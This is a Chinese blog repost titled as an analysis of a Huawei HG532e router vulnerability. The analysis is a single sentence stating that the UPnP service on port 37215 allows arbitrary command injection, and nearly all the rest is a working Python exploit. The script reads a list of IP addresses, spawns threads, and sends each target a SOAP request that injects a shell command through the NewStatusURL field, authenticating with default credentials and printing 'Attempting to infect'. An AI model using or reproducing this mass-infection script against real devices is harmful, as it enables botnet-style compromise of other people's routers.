码迷,mamicode.com
首页 > 其他好文 > 详细

HG532e漏洞分析

时间:2019-03-04 22:33:12      阅读:227      评论:0      收藏:0      [点我收藏+]

标签:python   iges   request   xpl   try   rip   run   mips   ctr   

漏洞原理

upnp 程序的 37215 端口存在任意命令注入

exp

#!/usr/bin/python
import threading, sys, time, random, socket, re, os, struct, array, requests
from requests.auth import HTTPDigestAuth

ips = open(sys.argv[1], "r").readlines()

cmd = "" # Your MIPS (SSHD)
rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
class exploit(threading.Thread):
        def __init__ (self, ip):
            threading.Thread.__init__(self)
            self.ip = str(ip).rstrip('\n')
        def run(self):
            try:
                url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
                requests.post(url, timeout=5, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
                print "[SOAP] Attempting to infect " + self.ip
            except Exception as e:
                pass
for ip in ips:
    try:
        n = exploit(ip)
        n.start()
        time.sleep(0.03)
    except:
        pass

HG532e漏洞分析

标签:python   iges   request   xpl   try   rip   run   mips   ctr   

原文地址:https://www.cnblogs.com/H4lo/p/10473687.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!